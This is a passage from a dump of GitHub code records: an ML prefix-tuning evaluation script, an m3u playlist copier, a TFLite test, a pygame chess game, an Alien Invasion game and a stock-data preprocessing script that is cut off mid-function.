None)\nparser.add_argument('--file1',type=str,default=None)\nparser.add_argument('--file2',type=str,default=None)\nparser.add_argument('--file3',type=str,default=None)\nparser.add_argument('--file', type = str, default = None)\nparser.add_argument('--diag_file', type = str, default = None)\nparser.add_argument('--eval_bs', type = int, default = None)\nparser.add_argument('--num_diag', type = int, default = 50)\n# boolean flags: argparse's type=bool treats any non-empty string as True,\n# so these are declared as store_true flags instead\nparser.add_argument('--average', action = 'store_true')\nparser.add_argument('--maximum', action = 'store_true')\nparser.add_argument('--use_wte', action = 'store_true')\nparser.add_argument('--average_later', action = 'store_true')\nargs=parser.parse_args()\n\ntorch.manual_seed(42)\n\nfile=open(args.test_file,'rb')\ndata_test=pickle.load(file)\nfile.close()\n\nfile=open(args.diag_file,'rb')\ndata_diag=pickle.load(file)[:args.num_diag]\nfile.close()\n \ndef read_data(data): \n lis=[]\n for i in range(len(data)):\n lis.append(InputExample(guid=str(i),text_a=data[i][0].replace('',''),tgt_text=data[i][1].replace('','')))\n\n return lis\n\ndataset={}\ndataset['test'] = read_data(data_test)\ndataset['diag'] = read_data(data_diag)\n \n\nclass Train:\n def __init__(self,dataset,args):\n self.dataset = dataset\n self.args=args\n\n print(args.use_wte)\n print(args.average)\n print(args.maximum)\n\n self.embed_params = torch.load(args.file).cuda()\n #self.weights = torch.load(args.weights).cuda()\n\n self.name = self.args.test_file.split('_')[0]\n\n self.eval_bs=args.eval_bs\n self.use_cuda = True\n\n plm, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n self.tokenizer = tokenizer\n self.plm = plm\n prefix_state1 = PrefixState(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'})\n prefix_state2 = PrefixState(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'})\n prefix_state3 = PrefixState(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'})\n prefix_state1.load_state_dict(torch.load(args.file1))\n prefix_state2.load_state_dict(torch.load(args.file2))\n prefix_state3.load_state_dict(torch.load(args.file3))\n\n self.mytemplate = PrefixTuningTemplate(model=plm, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, prefix1 = prefix_state1, prefix2 = prefix_state2, prefix3 = prefix_state3, maximum = args.maximum, use_wte = args.use_wte)\n\n self.test_dataloader = PromptDataLoader(dataset=dataset[\"test\"], template=self.mytemplate, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n\n self.prompt_model = PromptForGeneration(plm=plm,template=self.mytemplate, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode) \n \n if self.use_cuda:\n self.prompt_model = self.prompt_model.cuda()\n\n plm1, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n plm2, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n plm3, tokenizer, model_config, WrapperClass = load_plm(args.model_name.split('-')[0], args.model_name)\n self.mytemplate1 = PrefixTuningTemplate1(model=plm1, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 
'text_a', '': 'text_b'}, file = args.file)\n self.mytemplate2 = PrefixTuningTemplate1(model=plm2, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, file = args.file)\n self.mytemplate3 = PrefixTuningTemplate1(model=plm3, num_token=args.num_token, tokenizer=tokenizer, placeholder_mapping = {'': 'text_a', '': 'text_b'}, file = args.file)\n\n self.validation_dataloader1 = PromptDataLoader(dataset=dataset[\"diag\"], template=self.mytemplate1, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n \n self.validation_dataloader2 = PromptDataLoader(dataset=dataset[\"diag\"], template=self.mytemplate2, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n\n self.validation_dataloader3 = PromptDataLoader(dataset=dataset[\"diag\"], template=self.mytemplate3, tokenizer=tokenizer,\n tokenizer_wrapper_class=WrapperClass, max_seq_length=512, decoder_max_length=200,\n batch_size=self.eval_bs,shuffle=False, teacher_forcing=False, predict_eos_token=True,\n truncate_method=\"head\")\n\n self.mytemplate1.load_state_dict(torch.load(args.file1))\n self.mytemplate2.load_state_dict(torch.load(args.file2))\n self.mytemplate3.load_state_dict(torch.load(args.file3))\n\n self.prompt_model1 = PromptForGeneration1(plm=plm1,template=self.mytemplate1, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode)\n self.prompt_model2 = PromptForGeneration1(plm=plm2,template=self.mytemplate2, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode)\n self.prompt_model3 = PromptForGeneration1(plm=plm3,template=self.mytemplate3, freeze_plm=True,tokenizer=tokenizer, plm_eval_mode=args.plm_eval_mode) \n \n if self.use_cuda:\n self.prompt_model1 = self.prompt_model1.cuda()\n self.prompt_model2 = self.prompt_model2.cuda()\n self.prompt_model3 = self.prompt_model3.cuda()\n\n sentences1 = self.val1(self.prompt_model1, self.validation_dataloader1)\n sentences2 = self.val1(self.prompt_model2, self.validation_dataloader2)\n sentences3 = self.val1(self.prompt_model3, self.validation_dataloader3)\n \n model = SentenceTransformer('all-MiniLM-L6-v2')\n d1, d2, d3 = 0, 0, 0\n if args.average_later == False:\n for i in range(len(sentences1)):\n #print(torch.tensor(model.encode(sentences1[i])).shape, torch.tensor(model.encode(dataset['validation'][i].text_a)).shape)\n d1 += F.cosine_similarity(torch.tensor(model.encode(sentences1[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d2 += F.cosine_similarity(torch.tensor(model.encode(sentences2[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d3 += F.cosine_similarity(torch.tensor(model.encode(sentences3[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n \n self.weights = F.softmax(torch.tensor([d1, d2, d3]), dim = -1).cuda()\n\n else:\n self.weights = 0\n for i in range(len(sentences1)):\n #print(torch.tensor(model.encode(sentences1[i])).shape, torch.tensor(model.encode(dataset['validation'][i].text_a)).shape)\n d1 = F.cosine_similarity(torch.tensor(model.encode(sentences1[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d2 = 
F.cosine_similarity(torch.tensor(model.encode(sentences2[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n d3 = F.cosine_similarity(torch.tensor(model.encode(sentences3[i])).unsqueeze(0), torch.tensor(model.encode(dataset['diag'][i].text_a)).unsqueeze(0))[0]\n self.weights = self.weights + F.softmax(torch.tensor([d1, d2, d3]), dim = -1).cuda()\n \n self.weights = self.weights/len(sentences1)\n\n if args.average == True:\n self.weights = torch.tensor([1/3, 1/3, 1/3]).cuda()\n\n print('testing')\n #print(self.weights)\n with torch.no_grad(): self.val(0)\n\n def val1(self, model, data):\n generated_sentence = []\n groundtruth_sentence = []\n model.eval()\n \n for step, inputs in enumerate(data):\n if self.use_cuda:\n inputs = inputs.cuda()\n \n _,output_sentence=model.generate(inputs,\n num_beams=10, \\\n early_stopping=True, max_length=200,output_hidden_states=True,output_attentions=True)\n\n output_sentence=[o.replace('','').replace('','').replace('','').replace('','') for o in output_sentence]\n gold = [ii.replace('','').replace('','').replace('','').replace('','') for ii in inputs['tgt_text']]\n \n generated_sentence.extend(output_sentence)\n groundtruth_sentence.extend(inputs['tgt_text'])\n\n return generated_sentence\n\n\n def val(self,epoch):\n generated_sentence = []\n groundtruth_sentence = []\n self.prompt_model.eval()\n \n for step, inputs in enumerate(self.test_dataloader):\n ids = inputs['input_ids']\n tokens = self.tokenizer.batch_decode(ids)\n\n inputs['embeddings'] = self.embed_params.unsqueeze(0).tile(len(tokens), 1, 1)\n\n if self.use_cuda:\n inputs = inputs.cuda()\n \n _,output_sentence=self.prompt_model.generate(inputs,\n num_beams=10, \\\n early_stopping=True, max_length=200,output_hidden_states=True,output_attentions=True, weights = self.weights.unsqueeze(0).tile(len(tokens), 1))\n\n output_sentence=[o.replace('','').replace('','').replace('','').replace('','') for o in output_sentence]\n gold = [ii.replace('','').replace('','').replace('','').replace('','') for ii in inputs['tgt_text']]\n \n generated_sentence.extend(output_sentence)\n groundtruth_sentence.extend(inputs['tgt_text'])\n print(len(generated_sentence))\n print(len(groundtruth_sentence))\n\n acc = 0\n file=open(self.args.store+'/'+str(epoch)+self.name+'_test_gen.txt','w')\n file1=open(self.args.store+'/'+str(epoch)+self.name+'_test_ref.txt','w')\n for i in range(len(generated_sentence)):\n file1.write(groundtruth_sentence[i].strip()+'\\n')\n file.write(generated_sentence[i].strip()+'\\n')\n if groundtruth_sentence[i].strip() == generated_sentence[i].strip(): acc+=1\n\n file.close()\n file1.close()\n \n print(100*acc/len(generated_sentence))\n\ntrainer=Train(dataset,args)\n","repo_name":"pranavajitnair/DAPA","sub_path":"main_approach.py","file_name":"main_approach.py","file_ext":"py","file_size_in_byte":13398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7202995151","text":"import os.path\nimport shutil\nimport sys\n\n\ndef m3u_copy(source, destination):\n try:\n file = open(source).readlines()\n except IOError:\n print(\"Cannot open m3u file\")\n return\n if not os.path.exists(destination) or not os.path.isdir(destination):\n print(\"No such destination directory or destination is not a directory\")\n return\n if \"/\" in source:\n source_path = source[:source.rindex(\"/\")+1]\n else:\n source_path = \"\"\n shutil.copy(source, destination)\n for line in file:\n if line.strip() != '':\n line = 
line[:len(line) - 1]\n if \"/\" in line and not os.path.exists(destination + line[:line.rindex(\"/\") + 1]):\n os.makedirs(destination + line[:line.rindex(\"/\") + 1])\n if not os.path.isfile(source_path + line):\n print(f\"{line} does not exist\")\n else:\n try:\n shutil.copy(source_path + line, destination + line)\n except IOError:\n print(f\"{line} cannot be copied, function terminated\")\n return\n\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Usage: python ./m3u_copy \")\n else:\n m3u_copy(sys.argv[1], sys.argv[2])\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"SBanczyk/m3u_copy","sub_path":"m3u_copy.py","file_name":"m3u_copy.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18992883079","text":"#!/usr/bin/env python3\nimport tflite_runtime.interpreter as tflite\nimport numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n#from picamera import PiCamera\n#from picamera.array import PiRGBArray\nimport serial\nfrom time import sleep\n\n\n# Image Directory\nim_dir = '/home/pi/Mechatronics/Navigation/images'\n\n# Setup interpreter\ninterpreter = tflite.Interpreter(model_path='Nav-Model-1.tflite')\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\n# check the type of the input tensor\nfloating_model = input_details[0]['dtype']== np.float32\n\nfor i in range(0,5):\n\tinput_data = np.asarray([cv.cvtColor(cv.imread(im_dir+'/img'+str(i)+'.jpg'),cv.COLOR_BGR2RGB)], dtype=np.float32)\n\tprint(input_data.shape, type(input_data[0][0][0][0]))\n\n\tinterpreter.set_tensor(0,input_data)\n\t#interpreter.set_tensor(input_details[0]['index'],input_data)\n\n\tinterpreter.invoke()\n\n\t#output_data = interpreter.get_tensor(output_details[0]['index'])\n\t#results = np.squeeze(output_data)\n\toutput_data = interpreter.get_tensor(37)\n\tprint(output_data)\n\tprint(output_details[0]['index'])\n","repo_name":"Mitchelldscott/Mechatronics","sub_path":"Targeting/Threading/tf_test.py","file_name":"tf_test.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1867479679","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport Chess_pieces\nimport pygame\nimport chess\nimport math\n\n\n# In[2]:\n\n\n# Resize the image to a specific size\nnew_size = (90, 90) # Set the desired size\n#names\nb_pawn = pygame.transform.scale(pygame.image.load('Chess_pieces//b_pawn.png'), new_size)\nb_knight = pygame.transform.scale(pygame.image.load('Chess_pieces//b_knight.png'), new_size)\nb_bishop = pygame.transform.scale(pygame.image.load('Chess_pieces//b_bishop.png'), new_size)\nb_rook = pygame.transform.scale(pygame.image.load('Chess_pieces//b_rook.png'), new_size)\nb_queen = pygame.transform.scale(pygame.image.load('Chess_pieces//b_queen.png'), new_size)\nb_king = pygame.transform.scale(pygame.image.load('Chess_pieces//b_king.png'), new_size)\nw_pawn = pygame.transform.scale(pygame.image.load('Chess_pieces//w_pawn.png'), new_size)\nw_knight = pygame.transform.scale(pygame.image.load('Chess_pieces//w_knight.png'), new_size)\nw_bishop = pygame.transform.scale(pygame.image.load('Chess_pieces//w_bishop.png'), new_size)\nw_rook = pygame.transform.scale(pygame.image.load('Chess_pieces//w_rook.png'), new_size)\nw_queen = pygame.transform.scale(pygame.image.load('Chess_pieces//w_queen.png'), 
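# ---------------------------------------------------------------------------
# Editor's sketch: the conventional tflite invocation pattern, using the
# indices reported by get_input_details()/get_output_details() instead of the
# hard-coded tensor ids (0 and 37) in tf_test.py above. The model path is the
# one used by that script.
import numpy as np
import tflite_runtime.interpreter as tflite

interpreter = tflite.Interpreter(model_path='Nav-Model-1.tflite')
interpreter.allocate_tensors()
inp = interpreter.get_input_details()[0]
out = interpreter.get_output_details()[0]

dummy = np.zeros(inp['shape'], dtype=inp['dtype'])  # placeholder frame
interpreter.set_tensor(inp['index'], dummy)
interpreter.invoke()
print(interpreter.get_tensor(out['index']))
# ---------------------------------------------------------------------------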
new_size)\nw_king = pygame.transform.scale(pygame.image.load('Chess_pieces/w_king.png'), new_size)\n\n\n# In[3]:\n\n\n#initialise display\nX = 800\nY = 800\nscrn = pygame.display.set_mode((X, Y))\n\n#basic colours\nWHITE = (255, 255, 255)\nGREY = (128, 128, 128)\nYELLOW = (204, 204, 0)\nBLUE = (50, 255, 255)\nBLACK = (0, 0, 0)\n\n#initialise chess board\n\n\n#load piece images\npieces = {'p': b_pawn.convert(),\n 'n': b_knight.convert(),\n 'b': b_bishop.convert(),\n 'r': b_rook.convert(),\n 'q': b_queen.convert(),\n 'k': b_king.convert(),\n 'P': w_pawn.convert(),\n 'N': w_knight.convert(),\n 'B': w_bishop.convert(),\n 'R': w_rook.convert(),\n 'Q': w_queen.convert(),\n #'K': pygame.image.load('Chess_pieces//w_king.png').convert(),\n 'K': w_king.convert()\n \n }\n\n\n# In[ ]:\n\n\ndef update(scrn, board):\n '''\n Updates the screen based on the board class\n '''\n\n for i in range(64):\n piece = board.piece_at(i)\n if piece is None:\n continue\n else:\n piece_image = pieces[str(piece)]\n piece_rect = piece_image.get_rect()\n\n # Calculate the position to center the piece\n x = (i % 8) * 100 + (100 - piece_rect.width) // 2\n y = 700 - (i // 8) * 100 + (100 - piece_rect.height) // 2\n\n scrn.blit(piece_image, (x, y))\n\n for i in range(7):\n i = i + 1\n pygame.draw.line(scrn, WHITE, (0, i * 100), (800, i * 100))\n pygame.draw.line(scrn, WHITE, (i * 100, 0), (i * 100, 800))\n\n pygame.display.flip()\n\n\n# In[4]:\n\n\ndef main(BOARD):\n\n '''\n for human vs human game\n '''\n #make background black\n scrn.fill(BLACK)\n #name window\n pygame.display.set_caption('Chess')\n \n #variable to be used later\n index_moves = []\n\n status = True\n while (status):\n #update screen\n update(scrn,BOARD)\n\n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n status = False\n\n # if mouse clicked\n if event.type == pygame.MOUSEBUTTONDOWN:\n #remove previous highlights\n scrn.fill(BLACK)\n #get position of mouse\n pos = pygame.mouse.get_pos()\n\n #find which square was clicked and index of it\n square = (math.floor(pos[0]/100),math.floor(pos[1]/100))\n index = (7-square[1])*8+(square[0])\n \n # if we are moving a piece\n if index in index_moves: \n \n move = moves[index_moves.index(index)]\n \n BOARD.push(move)\n\n #reset index and moves\n index=None\n index_moves = []\n \n \n # show possible moves\n else:\n #check the square that is clicked\n piece = BOARD.piece_at(index)\n #if empty pass\n if piece == None:\n \n pass\n else:\n \n #figure out what moves this piece can make\n all_moves = list(BOARD.legal_moves)\n moves = []\n for m in all_moves:\n if m.from_square == index:\n \n moves.append(m)\n\n t = m.to_square\n\n TX1 = 100*(t%8)\n TY1 = 100*(7-t//8)\n\n \n #highlight squares it can move to\n pygame.draw.rect(scrn,BLUE,pygame.Rect(TX1,TY1,100,100),5)\n \n index_moves = [a.to_square for a in moves]\n \n # deactivates the pygame library\n if BOARD.outcome() != None:\n print(BOARD.outcome())\n status = False\n print(BOARD)\n pygame.quit()\n\n\n# In[5]:\n\n\n\npygame.init()\nb = chess.Board()\nmain(b)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[9]:\n\n\n\n\ndef main_one_agent(BOARD,agent,agent_color):\n \n '''\n for agent vs human game\n color is True = White agent\n color is False = Black agent\n '''\n \n #make background black\n scrn.fill(BLACK)\n #name window\n pygame.display.set_caption('Chess')\n \n #variable to be used later\n index_moves = []\n\n status = 
True\n while (status):\n #update screen\n update(scrn,BOARD)\n \n \n if BOARD.turn==agent_color:\n BOARD.push(agent(BOARD))\n scrn.fill(BLACK)\n\n else:\n\n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n status = False\n\n # if mouse clicked\n if event.type == pygame.MOUSEBUTTONDOWN:\n #reset previous screen from clicks\n scrn.fill(BLACK)\n #get position of mouse\n pos = pygame.mouse.get_pos()\n\n #find which square was clicked and index of it\n square = (math.floor(pos[0]/100),math.floor(pos[1]/100))\n index = (7-square[1])*8+(square[0])\n \n # if we have already highlighted moves and are making a move\n if index in index_moves: \n \n move = moves[index_moves.index(index)]\n #print(BOARD)\n #print(move)\n BOARD.push(move)\n index=None\n index_moves = []\n \n # show possible moves\n else:\n \n piece = BOARD.piece_at(index)\n \n if piece == None:\n \n pass\n else:\n\n all_moves = list(BOARD.legal_moves)\n moves = []\n for m in all_moves:\n if m.from_square == index:\n \n moves.append(m)\n\n t = m.to_square\n\n TX1 = 100*(t%8)\n TY1 = 100*(7-t//8)\n\n \n pygame.draw.rect(scrn,BLUE,pygame.Rect(TX1,TY1,100,100),5)\n #print(moves)\n index_moves = [a.to_square for a in moves]\n \n # deactivates the pygame library\n if BOARD.outcome() != None:\n print(BOARD.outcome())\n status = False\n print(BOARD)\n pygame.quit()\n\n\n# In[10]:\n\n\n\n\ndef main_two_agent(BOARD,agent1,agent_color1,agent2):\n '''\n for agent vs agent game\n \n '''\n \n #make background black\n scrn.fill(BLACK)\n #name window\n pygame.display.set_caption('Chess')\n \n #variable to be used later\n\n status = True\n while (status):\n #update screen\n update(scrn,BOARD)\n \n if BOARD.turn==agent_color1:\n BOARD.push(agent1(BOARD))\n\n else:\n BOARD.push(agent2(BOARD))\n\n scrn.fill(BLACK)\n \n for event in pygame.event.get():\n \n # if event object type is QUIT\n # then quitting the pygame\n # and program both.\n if event.type == pygame.QUIT:\n status = False\n \n # deactivates the pygame library\n if BOARD.outcome() != None:\n print(BOARD.outcome())\n status = False\n print(BOARD)\n pygame.quit()\n\n\n# In[11]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"dkimb0526/ChessAI","sub_path":"Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":9556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31240256797","text":"import sys\nimport pygame\nfrom pygame import mixer\nfrom time import sleep\n\nfrom settings import Settings\nfrom ship import Ship\nfrom bullet import Bullet\nfrom alien import Alien\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\n\n\nclass AlienInvasion:\n \"\"\"Overall Class to manage game and behaviors\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the game, and create resources\"\"\"\n pygame.init()\n self.settings = Settings()\n\n # Set screen size\n # self.screen = pygame.display.set_mode((self.settings.screen_width, self.settings.screen_height))\n # full screen\n self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n self.settings.screen_width = self.screen.get_rect().width\n self.settings.screen_height = self.screen.get_rect().height\n\n pygame.display.set_caption(\"Alien Invasion\")\n\n self.stats = GameStats(self)\n self.sb = Scoreboard(self)\n self.ship = Ship(self)\n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group()\n 
self._create_fleet()\n\n self.play_button = Button(self, \"Play\")\n\n mixer.init()\n self.beam_sound = mixer.Sound(\"sounds/beam.wav\")\n self.gun_sound = mixer.Sound('sounds/gun.wav')\n self.pop_sound = mixer.Sound('sounds/pop.wav')\n self.crash_sound = mixer.Sound('sounds/crash.mp3')\n\n\n def run_game(self):\n \"\"\"Start the main loop of game\"\"\"\n while True:\n # Watch keyboard and mouse for input events\n self._check_events()\n\n if self.stats.game_active:\n # position and update the Ship\n self.ship.update()\n # update bullet positions\n self._update_bullets()\n # alien ships\n self._update_aliens()\n #print(len(self.aliens))\n\n # Redraw the screen last\n self._update_screen()\n\n def _check_events(self):\n \"\"\"Respond to keyboard and mouse for input events\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self._check_keydown_events(event)\n elif event.type == pygame.KEYUP:\n self._check_keyup_events(event)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n\n def _check_keydown_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n # end game if 'q' or esc is pressed *** critical in full screen mode\n elif event.key == pygame.K_q or event.key == pygame.K_ESCAPE:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self._fire_bullet()\n elif event.key == pygame.K_p:\n self._start_new_game()\n\n def _check_keyup_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n\n def _update_screen(self):\n \"\"\" Update images and flip the screen \"\"\"\n self.screen.fill(self.settings.bg_color)\n self.ship.blit()\n for bullet in self.bullets.sprites():\n bullet.draw_bullet()\n\n self.aliens.draw(self.screen)\n\n self.sb.show_score()\n\n if not self.stats.game_active:\n self.play_button.draw_button()\n\n # Make the most recently drawn screen visible\n pygame.display.flip()\n\n def _update_bullets(self):\n # positions bullets\n self.bullets.update()\n\n # get ride of bullets off screen\n for bullet in self.bullets.copy():\n if bullet.rect.bottom <= 0:\n self.bullets.remove(bullet)\n # print(len(self.bullets))\n\n self._check_bullet_alien_collisions()\n\n def _repopulate_aliens(self):\n # no aliens left so repopulate. clear bullets and re create fleet\n if not self.aliens or len(self.aliens) == 0:\n self.settings.increase_speed()\n self.stats.level += 1\n self.sb.prep_level()\n self._reset_fleet()\n\n def _check_bullet_alien_collisions(self):\n # Check if bullet hit alien and remove them\n collisions = pygame.sprite.groupcollide(self.bullets, self.aliens, True, True)\n if collisions:\n self.pop_sound.play()\n for aliens in collisions.values():\n self.stats.score += self.settings.alien_points * len(aliens)\n self.sb.prep_score()\n self.sb.check_high_score()\n\n # if no aliens left so repopulate. 
clear bullets and re create fleet\n if not self.aliens or len(self.aliens) == 0:\n self._repopulate_aliens()\n\n def _fire_bullet(self):\n if len(self.bullets) < self.settings.bullets_allowed:\n new_bullet = Bullet(self)\n self.bullets.add(new_bullet)\n self.gun_sound.play()\n\n def _create_fleet(self):\n if not self.aliens or len(self.aliens) == 0:\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n available_space_x = self.settings.screen_width - (2 * alien_width)\n number_aliens_x = available_space_x // (2 * alien_width) # // floor division\n\n ship_height = self.ship.rect.height\n available_space_y = (self.settings.screen_height - (3 * alien_height) - ship_height)\n number_rows = available_space_y // (2 * alien_height)\n\n # create the first row of aliens\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n self._create_alien(alien_number, row_number)\n\n print(f\"create fleet {len(self.aliens)}\")\n\n def _create_alien(self, alien_number, row_number):\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n self.aliens.add(alien)\n\n def _update_aliens(self):\n \"\"\"\n Check if fleet hit a screen edge then\n Update the position of the alien fleet\n \"\"\"\n self._check_fleet_edges()\n self.aliens.update()\n\n # look for alien and ship collisions\n if pygame.sprite.spritecollideany(self.ship, self.aliens):\n self._ship_hit()\n\n # aliens landed\n self._check_aliens_bottom()\n\n def _check_fleet_edges(self):\n for alien in self.aliens.sprites():\n if alien.check_edges():\n self._change_fleet_direction()\n break\n\n def _change_fleet_direction(self):\n self.beam_sound.play()\n for alien in self.aliens.sprites():\n alien.rect.y += self.settings.fleet_drop_speed\n self.settings.fleet_direction *= -1\n\n\n def _reset_fleet(self):\n #print('reset')\n self.aliens.empty()\n self.bullets.empty()\n\n self._create_fleet()\n self.ship.center_ship()\n\n def _ship_hit(self):\n self.crash_sound.play()\n if self.stats.ships_left > 0:\n self.stats.ships_left -= 1\n self.sb.prep_ships()\n self._reset_fleet()\n # pause\n sleep(2.0)\n else:\n self.stats.game_active = False\n pygame.mouse.set_visible(True)\n\n def _start_new_game(self):\n if not self.stats.game_active:\n self.stats.game_active = True\n\n # Reset game\n self.stats.reset_stats()\n self.sb.prep_score()\n self.sb.prep_high_score()\n self.sb.prep_level()\n self.sb.prep_ships()\n self.settings.initialize_dynamic_settings()\n self._reset_fleet()\n\n # Hide mouse cursor\n pygame.mouse.set_visible(False)\n\n def _check_aliens_bottom(self):\n screen_rect = self.screen.get_rect()\n for alien in self.aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n self._ship_hit()\n break\n\n def _check_play_button(self, mouse_pos):\n button_clicked = self.play_button.rect.collidepoint(mouse_pos)\n if button_clicked and not self.stats.game_active:\n self._start_new_game()\n\n\nif __name__ == '__main__':\n # make an instance of the game and run it\n ai = AlienInvasion()\n ai.run_game()\n\n\n","repo_name":"volleyballfantic2/projects","sub_path":"python/PycharmProjects/alien_invasion/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"16758356502","text":"#python-how-to-import-other-python-files\n#https://stackoverflow.com/questions/2349991/python-how-to-import-other-python-files\n\n#python tab/space\n#http://blog.csdn.net/u012996583/article/details/36896705\n\nimport os\nimport pandas as pd\nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom sklearn.preprocessing import normalize\nfrom sklearn import preprocessing\nfrom keras.utils import np_utils\n\ndef numpy_test():\n\t#a=np.array([0,1,2,3])\n\tarr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])\n\tnp.delete(arr, np.s_[::2], 1)\n\tprint(np.shape)\n\ndef Initial_train_test(Ini_datapath, date, broken_feature):\n from os import path\n #Read Initial Data\n trainDataPath = path.join(os.path.abspath(Ini_datapath), 'stock_train_data_2017'+date+'.csv')\n testDataPath = path.join(os.path.abspath(Ini_datapath), 'stock_test_data_2017'+date+'.csv')\n train_ini_00 = pd.read_csv(trainDataPath, sep=',', delimiter=None)\n test_ini_00 = pd.read_csv(testDataPath, sep=',', delimiter=None)\n\n #Deal with Broken Feature (這幾期主辦單位給的feature有少)\n temp_str='feature'+str(broken_feature)\n train_ini_00[temp_str]=np.zeros(len(train_ini_00))\n test_ini_00[temp_str]=np.zeros(len(test_ini_00))\n\n #normalize feature\n train_ini=train_ini_00.copy(deep=True)\n test_ini=test_ini_00.copy(deep=True)\n for i in range(1,89,1):\n train_ini.iloc[:,i]=preprocessing.scale(train_ini.iloc[:,i])\n test_ini.iloc[:,i]=preprocessing.scale(test_ini.iloc[:,i]) \n\n #shift group number [1,28]->[0,27]\n test_ini['group']=test_ini['group']-1\n train_ini['group']=train_ini['group']-1\n\n #DataFrame to matrix\n train_array_ini=pd.DataFrame.as_matrix(train_ini)\n test_array_ini=pd.DataFrame.as_matrix(test_ini)\n\n ##remove useless column\n train_array=train_array_ini.copy()\n test_array=test_array_ini.copy()\n train_array=np.delete(train_array, np.s_[89:93], 1)\n train_array=np.delete(train_array, 0, 1)\n test_array=np.delete(test_array, 89, 1)\n test_array=np.delete(test_array, 0, 1)\n\n #Fill Broken Feature with ID\n for i in range(0,train_array.shape[0],1):\n train_array[i,43]=i\n for i in range(0,test_array.shape[0],1):\n test_array[i,43]=i+test_array.shape[0] \n CAT_Array=np.concatenate((train_array, test_array), axis=0)\n 